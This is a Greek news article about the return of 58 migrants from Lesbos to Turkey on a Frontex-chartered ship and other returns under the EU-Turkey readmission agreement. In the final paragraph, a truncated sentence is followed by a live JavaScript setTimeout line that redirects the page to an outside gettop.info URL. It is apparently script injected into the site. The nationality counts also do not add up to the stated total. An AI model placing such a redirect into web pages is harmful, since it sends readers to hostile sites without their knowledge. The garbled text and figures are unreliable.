Επιστροφή 58 μεταναστών στην Τουρκία

0
5

 

Aκτοπλοϊκώς με πλοίο ναυλωμένο από τον Frontex έγινε η επιχείρηση επιστροφής στην Τουρκία συνολικά 58 μεταναστών από τη Μυτιλήνη στο Δικελί.

Πρόκειται για 11 μετανάστες από την Αλγερία, έξι από το Πακιστάν, τεσσάρων από το Μαρόκο, δύο από τη Σρι Λάνκα, έναν από το Αφγανιστάν, και έναν Παλαιστίνιο, εκ των οποίων 19 είχαν απορριπτικές αποφάσεις σε β’ βαθμό, τρεις ανακάλεσαν από τη βούλησή τους για παροχή ασύλου και τρεις παραιτήθηκαν από τα αιτήματα για χορήγηση καθεστώτος διεθνούς προστασίας.

Επιπλέον, επεστράφηκαν χθες στην Τουρκία 30 μετανάστες (27 από το Αφγανιστάν και τρεις από το Ιράν – 16 άνδρες, 11 γυναίκες και 3 συνοδευόμενα παιδιά), οι οποίοι δεν ζήτησαν άσυλο.

Επίσης, στο πλαίσιο υλοποίησης της Συμφωνίας Επανεισδοχής ΕΕ-Τουρκίας, με επιχείρηση υπό την ευθύνη της ΕΛΑΣ και συνδρομή του Frontex, επεστράφησαν τρεις μετανάστες από την Τουρκία, όλοι άνδρες, χωρίς βούληση υποβολής αιτήματος ασύλου.

Η επιστροφή πραγματοποιήθηκ. Επίσης, στις 11 Οκτωβρίου 2016 παραδόθηκαν δύο Τούρκοι υπήκοοι μέσω του Συνοριακού Σταθμού των Κήπων Έβρου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here